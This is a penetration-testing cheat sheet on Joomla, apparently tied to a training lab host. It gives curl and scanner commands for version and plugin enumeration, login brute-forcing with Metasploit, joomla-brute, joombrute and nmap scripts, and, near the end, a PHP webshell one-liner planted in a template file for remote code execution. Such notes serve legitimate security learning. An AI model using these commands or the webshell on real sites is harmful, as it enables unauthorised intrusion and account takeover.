Joomla

101

Joomla is typically used with PHP and MySQL (similar to WordPress) and can be identified by its favicon:

Joomla's has the following user roles:

User	Description
Super Users/Administrator	Access to administrative features (adding, deleting users and posts, editing source code)
Administrator	Admin functions except global options
Manager	Content creation and backend system info

Footprinting

Manual

CMS

curl -s http://dev.inlanefreight.local/ | grep Joomla

Version

Enumerate the version:

curl -s http://dev.inlanefreight.local/README.txt | head -n 5

In certain installs, we may be able to discover the version from other dirs or JS files:

curl -s http://dev.inlanefreight.local/language/en-GB/en-GB.xml | xmllint --format -

curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -

# Version enumeration via JS files
curl -s http://dev.inlanefreight.local/media/system/js

# Plugins might helps us estimate the version
curl -s http://dev.inlanefreight.local/plugins/system/cache/cache.xml | xmllint --format -

droopescan

droopescan is a plugin-based scanner designed mostly for SilverStripe, WordPress, and Drupal, but it has some functionality for Joomla and Moodle as well:

droopescan scan joomla --url http://dev.inlanefreight.local/

joomlascan

joomlascan is an open source software that finds the components installed in Joomla CMS:

python2.7 joomlascan.py -u http://dev.inlanefreight.local

Attacks

Fuzzing

Manual

Fuzzing can be used for further directory, plugin, and theme enumeration (joomla.txt):

# Fuzzing for plugins
$ ffuf -u http://dev.inlanefreight.local/FUZZ -w usr/share/wordlists/joomla/joomla.txt -c -ac

MSF

The MSF's module joomla_plugins can be used to enumerate plugins:

msf > use auxiliary/scanner/http/joomla_plugins
msf auxiliary(joomla_plugins) > show actions
        ...actions...
msf auxiliary(joomla_plugins) > set ACTION < action-name >
msf auxiliary(joomla_plugins) > show options
        ...show and set options...
msf auxiliary(joomla_plugins) > run

BFA

Joomla 3.2 stable release bought 2FA as part of the core install which adds another challenge to BFAs. However, this isn't enabled by default.

The default administrator account is admin and the password is set at install time:

MSF

MSF's joomla_bruteforce_login module can be used for a BFA:

msf > use auxiliary/scanner/http/joomla_bruteforce_login
msf auxiliary(joomla_bruteforce_login) > show actions
        ...actions...
msf auxiliary(joomla_bruteforce_login) > set ACTION < action-name >
msf auxiliary(joomla_bruteforce_login) > show options
        ...show and set options...
msf auxiliary(joomla_bruteforce_login) > run

joomla-brute

joomla-brute is Joomla login bruteforcer:

sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

joombrute

joombrute is a Joomla bruteforcer:

python joombrute.py --url http://site/administrator --username admin --wordlist passwords.txt

Nmap

nmap has a Joomla-specific NSE as well as a general one for BFA against HTTP forms:

# Basic usage of the Joomla-specific NSE
nmap -sV --script http-joomla-brute <target>

# Custom usage of the Joomla-specific NSE
nmap -sV --script http-joomla-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-joomla-brute.hostname=domain.com, http-joomla-brute.threads=3,brute.firstonly=true' <target>

# General NSE script
nmap --script http-form-brute -p 80 <host>

RCE

We can upload a webshell as by editing a template (e.g. error.php) and adding a PHP webshell:

# Webshell payload
system($_GET['c']);

# Interact with the webshell
curl -s http://dev.inlanefreight.local/templates/protostar/error.php?c=id

Vulnerabilities

There is a live vunlerable extensions list.